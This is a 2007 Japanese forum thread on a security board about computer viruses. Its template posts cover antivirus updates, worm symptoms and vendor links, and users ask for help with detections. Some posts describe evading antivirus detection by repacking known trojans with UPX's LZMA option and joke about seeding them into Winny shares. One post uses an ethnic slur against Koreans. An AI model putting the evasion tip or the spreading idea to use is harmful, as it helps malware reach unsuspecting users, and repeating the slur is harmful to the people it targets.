07/05/01 20:17:24
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。
最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。
■■ワクチンメーカーリンク集■■ ※ウィルス監視ソフトをワクチンソフトとも呼びます。
・トレンドマイクロ株式会社 URLリンク(www.trendmicro.co.jp)
製品名:ウイルスバスター2007インターネットセキュリティ他
・株式会社シマンテック URLリンク(www.symantec.com)
製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)URLリンク(www.vintage-solutions.com)
製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン URLリンク(www.aladdin.co.jp)<)
製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 URLリンク(www.mcafee.com)
製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
URLリンク(www.nai.com) (リンク切れ)
該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3:名無しさん@お腹いっぱい。
07/05/01 20:17:59
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
URLリンク(www.ipa.go.jp)
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4:名無しさん@お腹いっぱい。
07/05/01 20:18:39
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十~数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十~数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
~サイバークリーンセンター より引用~
サイバークリーンセンター ボットとは
URLリンク(www.ccc.go.jp)
TREND MICRO ボット系ウイルス対策Web
URLリンク(www.trendmicro.com)
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
URLリンク(itpro.nikkeibp.co.jp)
5:名無しさん@お腹いっぱい。
07/05/01 20:19:13
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
URLリンク(www.microsoft.com)
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
URLリンク(www.microsoft.com)
* Windows XP編
URLリンク(www.microsoft.com)
* Windows 2000編
URLリンク(www.microsoft.com)
* シマンテック
URLリンク(www.symantec.co.jp)
URLリンク(www.symantec.co.jp)
* トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
URLリンク(www.trendmicro.co.jp)
6:名無しさん@お腹いっぱい。
07/05/01 20:19:47
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
URLリンク(www.microsoft.com)
Blaster トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
Blaster シマンテック
URLリンク(www.symantec.co.jp)
Welchia トレンドマイクロ
URLリンク(www.trendmicro.co.jp)
Welchia シマンテック
URLリンク(www.symantec.co.jp)
7:名無しさん@お腹いっぱい。
07/05/01 20:20:20
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
URLリンク(www.ipa.go.jp)
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
URLリンク(www.ipa.go.jp)
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
8:名無しさん@お腹いっぱい。
07/05/01 20:20:55
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
URLリンク(info.2ch.net)
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
URLリンク(www.symantec.com)
・Trend Micro ウイルス情報
URLリンク(www.trendmicro.co.jp)
・McAfee ウイルス情報
URLリンク(www.mcafeesecurity.com)
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part60
スレリンク(download板)
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part10
スレリンク(sec板)
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part12
スレリンク(sec板)
9:名無しさん@お腹いっぱい。
07/05/01 20:21:30
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
URLリンク(www.kaspersky.co.jp)
シマンテック・セキュリティチェック
URLリンク(www.symantec.com)
ウイルスバスターオンラインスキャン
URLリンク(www.trendmicro.co.jp)
トレンド フレックス
URLリンク(trendflexsecurity.jp)
削除可
BitDefender Online Scanner
URLリンク(www.bitdefender.com)
削除可
Panda ActiveScan
URLリンク(www.pandasoftware.com)
削除可
F-Secure オンラインスキャナ
URLリンク(www.f-secure.co.jp)
ウイルスチェイサー for WEB
URLリンク(www.viruschaser.jp)
関連スレッド
オンラインによるウイルスチェックサービス
スレリンク(sec板)
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
10:名無しさん@お腹いっぱい。
07/05/01 20:22:28
関連スレッド
セキュリティ初心者質問スレッドpart82
スレリンク(sec板)
Winnyを狙ったワーム・ニュイルス情報 Part60
スレリンク(download板)
☆☆トロイの木馬☆☆4台目
スレリンク(sec板)
sasser【スタコラサッサ】sasser Part2
スレリンク(sec板)
Blasterスレ part5
スレリンク(sec板)
【緊急!】ウィルス即行駆除方法【助けて!】
スレリンク(sec板)
アンチウィルスソフトのウィルス誤検出
スレリンク(sec板)
毎日ウィルスメールが送られてくるのですが・・2通目
スレリンク(sec板)
【分析】HijackThis【研究】
スレリンク(sec板)
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
URLリンク(www.yahoo.co.jp)
URLリンク(www.google.co.jp)
11:名無しさん@お腹いっぱい。
07/05/01 20:25:18
テンプレはここまで!
| ヽ| |_ 「 〉
⊥ 人_ _|_ |/
O
関連スレのリンク切れの修正はお願いします。
疲れたな・・・・あとは任せる
12:名無しさん@お腹いっぱい。
07/05/01 20:25:59
黄金週間中なのに乙
13:名無しさん@お腹いっぱい。
07/05/01 20:34:08
P2P(Winny、Share、etc.)ウイルスは板違い。移動しろ。
たとえアップローダで踏んだとしても移動しろ。
Download
URLリンク(tmp6.2ch.net)
キンタマ、山田、ニュイルスなどでスレ探せ。
14:名無しさん@お腹いっぱい。
07/05/01 20:39:13
>>13
■P2Pでウイルスに感染した人へ■
『自力で解決を図るか、それが出来ないならリカバリ(OS再インストール)して下さい』
Q.バックアップを取るのを忘れてしまったのですが…
A.勉強だと思って諦めてください
Q.何とかなりませんかねー?
A.P2P使用による感染のサポートはここでは一切しておりません
Q.そこを何とか!
A.ではこちらへ↓Winnyを狙ったワーム・ニュイルス情報 Part61
スレリンク(download板)
これだろ、前スレ>>992の希望で削除されたみたい
15:名無しさん@お腹いっぱい。
07/05/01 21:18:08
>>14
992のは、★質問用テンプレ★ が、1と被ってるから、要らないと言ったんじゃないのか?
16:名無しさん@お腹いっぱい。
07/05/01 21:40:25
アップローダで踏んだケースも板違いだ、移動しろというのはいかがなものか。
17:名無しさん@お腹いっぱい。
07/05/01 21:42:53
>>15
そっか、次回からテンプレは12で収まるな
18:名無しさん@お腹いっぱい。
07/05/01 22:08:23
>>16
キンタマや山田や原田をここで延々やるのも違うだろ?
19:補足の参考情報
07/05/01 22:08:31
■2007年2月最新の総合的なアンチウイルス性能テスト結果。
(av-comparatives.orgという専門組織のテスト)
※ウイルス定義パターン検出+ヒューリスティック検出の総合性能※
スレリンク(sec板:336番)
20:名無しさん@お腹いっぱい。
07/05/01 23:14:53
>>18
確かにな。ノウハウもあっちのがあるし
21:名無しさん@お腹いっぱい。
07/05/01 23:17:37
【使用OS】xp
【Microsoft Updateの状態】 最新
【使用セキュリティソフトとバージョン】 avst
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 spy-bot ad-ware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新
【ルータの有無】 有り
【症状】 ad-wareでスキャンしたら『win32.hacktool.toolevld』っていうのが見つかりました
ググっても英語でぜんぜんわかりません
どういうウイルスなのかおしえてください
22:名無しさん@お腹いっぱい。
07/05/01 23:40:14
>>21
アドで検出されたんならスパイウェアです
23:名無しさん@お腹いっぱい。
07/05/01 23:52:55
>>21
『win32.hacktool.toolevld』自動翻訳
URLリンク(translate.google.com)
フォーラム自動翻訳
URLリンク(translate.google.com)
24:名無しさん@お腹いっぱい。
07/05/02 09:19:47
★質問用テンプレ★ 長いけれどよろしくです!
【使用OS】 XP SP2 P4 2GHz-M 512GB
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 VB2007だが 教えて欲しい
【ルータの有無】 牛社製あり
【どんな症状が出るか】 UVを外すと当時のように軽くなり、モッサリの元凶がUVソフトと感じた。
【その他の質問】
上記のPCでVBやノートン、Mcfなど最近のものを入れるととてもストレスが溜まる。
なまじ X2 5000+ 2GBなどと同時に使っていると尚ストレスが溜まる。
ある日リカバリ環境復元後UVなしで使っているとあまりの軽さに驚くとともにUVソフトの影響度が高いことを認識した。
そこで質問ですが、
上記のような現在では低スペックのPCでも低負荷なUVソフトはずばりどんなものでしょうか?
有償無償版問いません。 ですが、あえて有償版で軽快が売りのものは存在しますか?
尚UV機能とFW機能のみ実装で設定はデフォとして。
それから
華美なGUIなどを廃した低スペック専用バージョンというのは有償版で存在しますか?
なければ無償版含めてある程度のUV効果を期待でき、軽快さに比重を置いたお勧めのソフト及び設定はありますか?
●日々増殖してゆくマルウエアに対しては、UVソフト自体が高負荷化するのは仕方のないことなのですか?
教えてください・・・
25:名無しさん@お腹いっぱい。
07/05/02 09:44:42
UVソフトファンデーションはお肌の味方です
26:名無しさん@お腹いっぱい。
07/05/02 10:19:23
>>24
カスペは軽いよ
27:名無しさん@お腹いっぱい。
07/05/02 10:52:06
>>26
情報ありがとうございます。
カスペはオンラインでしか使ったことがありませんが、巷?の評判は良いようですね。
実際使わないと判断できかねると思いますが、提灯臭くない客観的に比較しているサイト、
優位性を含んだ記述のあるソースを教えていただけないでょうか。
お時間があればでけっこうです。
28:名無しさん@お腹いっぱい。
07/05/02 11:30:20
>>27
URLリンク(www4.pf-x.net)
29:名無しさん@お腹いっぱい。
07/05/02 12:31:05
>>27
URLリンク(ratan.dyndns.info)
30:名無しさん@お腹いっぱい。
07/05/02 12:43:26
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・カスベは、いいよ、これで、ウイルス、全部とれた、ヨー、日本一 (2007/04/14(土) 09:22/カトチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:28/デコチヤン)
・ノートン、アバスト、AVG、みんな、糞だよ、みんな、カスぺに、しましよ (2007/04/14(土) 09:29/デコチヤン)
・KIS7まだ? (2007/04/14(土) 21:17)
31:名無しさん@お腹いっぱい。
07/05/02 12:47:01
28 29さん ご紹介ありがとうございます。
さっそく拝見させていただきます。 お手数お掛けしました。
32:名無しさん@お腹いっぱい。
07/05/02 12:49:49
>優位性を含んだ記述のあるソースを教えていただけないでょうか。
宣伝乙w
33:名無しさん@お腹いっぱい。
07/05/02 12:57:41
変な言い掛かり付けるより、自分も宣伝してみたらー?
34:名無しさん@お腹いっぱい。
07/05/02 13:02:15
>>26
カスは重いソフト第3位
URLリンク(gigazine.net)
どうしてもこの事実を抹消させたいカス業者工作員(笑)
35:名無しさん@お腹いっぱい。
07/05/02 13:07:12
カトチヤンとデコチヤンは同一人物だよね
36:名無しさん@お腹いっぱい。
07/05/02 13:08:14
>優位性を含んだ記述のあるソースを教えていただけないでょうか。
37:名無しさん@お腹いっぱい。
07/05/02 13:09:29
>>26=>>34
滓な濃度32厨の自演工作 カワイソ(´・ω・) ス
38:名無しさん@お腹いっぱい。
07/05/02 13:09:47
宣伝してやろうか?
39:24 27 31
07/05/02 14:33:59
>25
これは恥ずかしい(^^ゞ anti のAでした。 A/Vでした。
>32
なぜ?と思いましたが、結果的に宣伝になってしまうんですね。
でも精度の高い情報が欲しかったのです。
>28 29さん
一通り拝見させていただきました。
今使ってるものは VB2007 McA2007 Norton I/S2005
動作マシンスペックに依れど、或いは使わないものは切り捨ててもどれも軽快な感じは受けません。
更に環境内容に因っても体感的に変わってくるのかも知れませんね・・・
やはり素人使用に於いては検出力、防御力などが優れているものは重くなってもしょうがない、
それを回避するならば高スペックのPCに変えるのが得策と考えるべきでしょうか。
40:名無しさん@お腹いっぱい。
07/05/02 14:49:37
>>39
同じようなスペックだけどNIS2005からKIS6に乗り換えたら軽くて驚いた。
41:24 27 31 39
07/05/02 14:57:21
>>40
KIS6とはカスペでしょうか。
論より証拠 やはり一度使ってみてからでしょうか。
その上でまた不満があればいろいろ模索してみようと思います。
というか体験版があったような気がしますのでそれで様子を見てみます。
ご助言感謝します。
42:名無しさん@お腹いっぱい。
07/05/02 15:16:54
と、幼稚な自演で取り繕おうとする劇団ひとりでしたw
43: ◆N9P3SuvBPo
07/05/02 17:56:16
明日から連休だ~
テンプレ貼ってくれた人お疲れ様。
>24
本当はセキュ質スレ向けの質問なんだけど…まあ
>【使用OS】 XP SP2 P4 2GHz-M 512GB
メモリが512GBってw、512MBだよな。
それで、アンチウイルス(総合型セキュリティソフト)を入れると、モッサリするってね。
常駐型セキュリティソフト入れれば重くなるのは当たり前だ。
>尚UV機能とFW機能のみ実装で設定はデフォとして。
必要最小限の機能で使うのなら今のメモリでも問題無いんだけど、
デフォルトの設定だとな~…やっぱり、メモリを増設するしかないかもな。
俺だったら、必要の無い常駐ソフトやサービスを無効にするな。
44:名無しさん@お腹いっぱい。
07/05/02 18:26:10
URLリンク(gigazine.net)
悪意あるソフトの80%はアンチウイルスソフトが効かない
これ見るとウィルスソフトなんてどれでもいいって気になるw
45:名無しさん@お腹いっぱい。
07/05/02 21:58:36
QuickTime7.1.6出てるな
46:名無しさん@お腹いっぱい。
07/05/02 22:00:32
というか端から思ってたけど、デジタルで完璧なんてありえんよね
個人情報保護なんて建前だけでダダ漏れでしょw
そもそもアンチウイルスソフトすらまともに入れていない一般人が多いんじゃないかな
だいたいでなんとかカワセんじゃねか 運次第w
47:名無しさん@お腹いっぱい。
07/05/02 22:36:33
「TROJ_VB.CZJ」
こんな名前のウイルスに感染したようです。
何か情報あったら教えて。
48:名無しさん@お腹いっぱい。
07/05/02 22:55:38
>>47
つURLリンク(www.trendmicro.co.jp)
49:名無しさん@お腹いっぱい。
07/05/02 23:22:25
>>48
ありがとう。
んんん何がどーなるのか、どーすればいいのか、
わからん。
50:名無しさん@お腹いっぱい。
07/05/02 23:31:16
多分こうじゃないか
1.アップデートでVBを最新
2.スキャンで感染したファイルを特定
3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除
51:名無しさん@お腹いっぱい。
07/05/02 23:37:38
1.アップデートでVBを最新
avast・ノートンの最新にはありませんでした。
2.スキャンで感染したファイルを特定
ウイルスバスター オンラインスキャンでファイル名がわかりました。
3.タスクマネージャのプロセスからマルウェアを終了
4.感染したファイルを削除
どうやるんですか?
本当にわかりません。
52:名無しさん@お腹いっぱい。
07/05/02 23:39:49
書き忘れました。
ウイルスバスターでの対処法は英語のみでわかりませんでした。
53:名無しさん@お腹いっぱい。
07/05/02 23:47:45
Windows 98、MEなら
CTRL+ALT+DELETE
Windows NT, 2000, XP, Server 2003なら
CTRL+SHIFT+ESCと書いてあるけどウチのXPでは起動しなかったので
CTRL+ALT+DELETEでタスクマネージャを選択してプロセスタブ
イメージ名をクリックするとABC順に並んで見やすくなる
この中にあってはならないプロセス(マルウエア)があったら終了させる
どれがマルウェアかは俺にも分らんがw
感染ファイル削除もVB上で行うのかエクスプローラから削除するのかも分らん
と言うことでVBからの削除が出来なかったらエクスプローラからの削除を試みれば?
54:名無しさん@お腹いっぱい。
07/05/03 00:38:39
ありがとうございます。
エクスプローラから削除してみます。
55:名無しさん@お腹いっぱい。
07/05/03 13:56:05
Trend Flex Security オンラインスキャンを実行したところ
TSPY_Banker.BF というスパイウェアが検出されましたが、
どのファイルがスパイウェアなのか表示されませんでした。
スパイウェアのファイル名を知る方法はありませんか?
56:名無しさん@お腹いっぱい。
07/05/04 21:42:15
別にウイルスというほどのものではないが、
3台のPCのうち2台のPCのキーボードがいつの間にか106タイプじゃなくなっていて、日本語タイプの時に多少支障が出た。
ドライバ変更で対処しようとしたが、かたや106がリスト表示になく、もう一つは変更してもダメだった。
しかたなくレジストリから変更をやってみようとして、エディタを開き該当フォルダ内を見てびっくり。
「LayerDriver JPN」の他にもう一つ「LayerDriver KOR」が存在した。よく調べりゃ3台全部に。
こんなところに糞コリアンが隠れていようとは・・・レジストリに寄生するゴミなので早速削除。
まったく油断も隙もない。
57:名無しさん@お腹いっぱい。
07/05/04 23:15:53
で?
オチは?
58:名無しさん@お腹いっぱい。
07/05/04 23:29:50
【使用OS】xp
【Microsoft Updateの状態】 最新
【使用セキュリティソフトとバージョン】 ノートン2005 ver最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 ad-aware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新
【ルータの有無】 なし
【症状】 定期的にdrive cleanerの宣伝告知がアラート音と共に表示され、たまに海外サイトのエロHPが表示されて困ってます。
アンチスパイウェアで掃除しても定期的にスパイウェアが放り込まれてキリがありません…。
ウイルスソフトで駆除も行った所、色々見つかったので削除したんですが、kbdcui.dllがtrojan horseに感染しているらしく、先生でも検疫できず、セーフモードで削除しようとしても削除できませんでした。
検索しても対処法が見つからずに困っています。どなたか退治法を教えていただけないでしょうかorz
59:名無しさん@お腹いっぱい。
07/05/04 23:37:26
書き忘れ…フルパスはC:\WINDOWS\system32\kbdcui.dll です
WinAntiVirus PROの広告が表示されるのも忘れてましたorz
60:名無しさん@お腹いっぱい。
07/05/04 23:40:35
>>58
WinAntiVirus PROで・・・
定番過ぎて
61:名無しさん@お腹いっぱい。
07/05/04 23:48:02
定番すぎでしたか…
drive cleanerもWinAntiVirus PROも警告が怪しすぎたのでダウンロードもインストもしなかったんですが…
過去ログも見れないし…リカバリしかないんですかね…orz
62:名無しさん@お腹いっぱい。
07/05/04 23:48:42
>>58
こっちが専用スレ
スレリンク(sec板)
63:名無しさん@お腹いっぱい。
07/05/04 23:53:10
>>61
adだけなのぉてspy-botやら
他のでも試し、
ほんでな、システムの復元は切っとかんと
復活しよるもんもあるで
まぁ、削除後は怪しげな単語で検索してみ
あったら手動で削除
気ぃ落とさんと気長にやり
64:名無しさん@お腹いっぱい。
07/05/04 23:56:34
kbdcui.dllがトロイっぽかったのでこっちかと思いました…
誘導感謝ですm(_ _)m
65:名無しさん@お腹いっぱい。
07/05/04 23:57:43
>>62 >>63
他のソフトでも試してみます。重ね重ねありがとうございましたm(_ _)m
66:名無しさん@お腹いっぱい。
07/05/05 00:03:41
ファイル消せないだけならunlockerで大抵のものは消せると思うけど
URLリンク(xp-delete.hp.infoseek.co.jp)
あとvundo fix を試す
URLリンク(www.higaitaisaku.com)
xpをsp2にしてMS update
できればルーターもいれといたほうがいい
67:名無しさん@お腹いっぱい。
07/05/05 00:09:04
>>58
Symantec - サポート
URLリンク(www.symantec.com)
■ウイルスとリスク (スパイウェア & ウイルス駆除の相談)
68:名無しさん@お腹いっぱい。
07/05/05 00:40:37
>>58
2005はスパイウェアを検出できても駆除は無理だよ
69:名無しさん@お腹いっぱい。
07/05/05 03:14:14
質問です。データー等開く時にウイルスがあるかないか自動的にやってくれるソフトはありますか?
70:名無しさん@お腹いっぱい。
07/05/05 14:31:19
普通のアンチウイルスソフトはみんなやってることだが
71:名無しさん@お腹いっぱい。
07/05/05 22:07:55
virustotal uploader
URLリンク(blog.hispasec.com)
これいいわ
インストすると右クリ→送る からvirustotalへ直行する
下手なウイルススキャンよりいいかも
しかしvt更に重くなるんだろなw
72:名無しさん@お腹いっぱい。
07/05/05 22:18:17
お前んちのパソコンも無駄に重くなるしな
73:名無しさん@お腹いっぱい。
07/05/05 22:19:20
入れなくていいよ
74:名無しさん@お腹いっぱい。
07/05/06 02:37:03
UPX3.00が出ていたのでちょっと確認してみた。
手持ちの既知の無圧縮トロイをオプション無しで固めて検知を確認した後
3.00(厳密にはベータの2.90)で新設されたLZMA(--lzmaオプション)で固めると
検知しなくなる製品がいっぱいある…。
Packerの識別と解凍はエンジン側に手入れしなきゃだめかもね。
75:名無しさん@お腹いっぱい。
07/05/06 02:41:56
解凍すれば検知するのだからあまりどうでもいい
VirusTotalに突っ込んでその結果が絶対だと思ってるアホどもを騙すには丁度良いが
76:名無しさん@お腹いっぱい。
07/05/06 03:13:48
パッカーとかステルスじゃねえし
77:名無しさん@お腹いっぱい。
07/05/06 03:32:42
>>75
VirusTotaはパッカー表示されるだろうがハゲ
78:名無しさん@お腹いっぱい。
07/05/06 03:35:09
>>77
馬鹿は発言しなくていいよ。
79:名無しさん@お腹いっぱい。
07/05/06 04:22:46
>>74
検知しないからと言って困る状況がほとんどない
未対応のPackerで固められた、その出所不明のファイル自体がすでに胡散臭い怪しい存在
そんなファイルがオンデマンドで検知されなかったからと言って、実行もされずにその後どうされるのやら
80:名無しさん@お腹いっぱい。
07/05/06 05:51:10
WinnyとかのUploadフォルダに突っ込んでしばらくニヤニヤできる
81:名無しさん@お腹いっぱい。
07/05/06 06:15:27
>>78
>>78
82:名無しさん@お腹いっぱい。
07/05/06 20:41:23
問題はマルウエア自身が毎回異なるUPX圧縮をして自身を変化させるタイプだな
まぁ、そんなのに感染したら素直にリカバリしてしまえばいいんだが
83:名無しさん@お腹いっぱい。
07/05/06 21:24:33
UPXの実行時解凍はファイルが作成されるわけではない
メモリ上で行われるから検知出来ないか出来ても後の祭り
84:名無しさん@お腹いっぱい。
07/05/06 21:44:47
ほとんど脅威に感じない
85:名無しさん@お腹いっぱい。
07/05/06 22:12:25
>>83
アホか
一度自分でやってみろ
86:名無しさん@お腹いっぱい。
07/05/07 10:42:36
>>83
ボンバー型のトロイはそうだが、大概のマルウエアは常駐ファイルを生成するから
それに反応するはず。それが>>82だったらアウトだけどな
87:名無しさん@お腹いっぱい。
07/05/07 19:19:52
ねむい氏
More優しく!
88:名無しさん@お腹いっぱい。
07/05/07 21:38:51
>>83
普通の使い方をしてたらEXEを踏むことはまずない
脆弱性だけ注意していたらいいと思う
89:名無しさん@お腹いっぱい。
07/05/07 21:44:09
お前は踏まないんだろうが
もらいもんのzipで踏んづけた > たすけて~ドラえも~ん なやつなんて結構いるだろが
90:名無しさん@お腹いっぱい。
07/05/07 22:17:45
>>89
あと割れの「エロゲ.exe」とか簡単に踏むやつ多いよなwwwwww。
やっぱ人につけいるならエロからだろ。
91:名無しさん@お腹いっぱい。
07/05/07 22:18:45
確かにIexplorer.exeのフォルダにUPX圧縮されたWS2_32.DLLのフック版を落とされたら終わりだな
92:名無しさん@お腹いっぱい。
07/05/07 23:00:26
もらいもんのウイルスってなんだよ
馬鹿と関係を持った自分の頭の悪さを嘆け
93:名無しさん@お腹いっぱい。
07/05/07 23:14:26
そういうのを見かけるって話だけど書き方が悪かったすかね
94:名無しさん@お腹いっぱい。
07/05/07 23:16:35
精神がウイルスに侵されてる奴はスルーしとけ
95:名無しさん@お腹いっぱい。
07/05/07 23:20:44
>>93
別にお前さんに言うとらん
そんな馬鹿の例など挙げるだけ無駄という話だ
八割方違法物だろ、むしろ引っかかって感染しろ
96:名無しさん@お腹いっぱい。
07/05/07 23:27:54
小学、中学ぐらいの年代はアプロダへのリンクで踏んじゃう
疑うことを知らないからな
97:名無しさん@お腹いっぱい。
07/05/08 00:29:40
>もらいもんのzipで踏んづけた > たすけて~ドラえも~ん なやつなんて結構いるだろが
結構いるかどうかは分からないが、いるかもしれないな。
だからなんだ。
98:名無しさん@お腹いっぱい。
07/05/08 00:31:54
感じるんだ
99:名無しさん@お腹いっぱい。
07/05/08 00:34:30
なんだそれ。 つか原田君いるかね
100:名無しさん@お腹いっぱい。
07/05/10 17:06:07
■新種ウイルス発生なのでご注意■
感染したPCをbot化すると思われる新種ウイルスが見つかってます。
これを検出できるアンチウイルス製品が完全に出揃っていないのでご注意ください。
無料アンチウイルスでは、BitDefender、AVG、AntiVir、Avastなどが検出できます。
有料アンチウイルスでは、McAfee、Kaspersky、F-Secureなどが検出できます。
NOD32やMicrosoft製アンチウイルスなどは、まだ検出できないので、特にご注意ください。
検出できる製品は赤字で検出名が表記されています(URLリンク(www.virustotal.com)による検証)。
URLリンク(vista.crap.jp)
101: ◆N9P3SuvBPo
07/05/10 18:25:31
スレ立て10日目でやっと100レスですか。
セキュ質スレでは大体10日前後で次スレですが…
まったり行きますか。
102:名無しさん@お腹いっぱい。
07/05/10 18:40:37
スレの特色が薄いんじゃない
>>1がイキナシもうテンプレだし
それ以降のテンプレはゴチャゴチャだし
103:名無しさん@お腹いっぱい。
07/05/10 19:23:11
テンプレもいまどきBlasterとかいらんだろ
104:名無しさん@お腹いっぱい。
07/05/10 21:44:42
*水曜日のWindowsUpdate更新プログラムについての不具合(>>335の追記)
427 名前:名無し~3.EXE[sage] 投稿日:2007/05/09(水) 22:29:25 ID:nDIeetqy
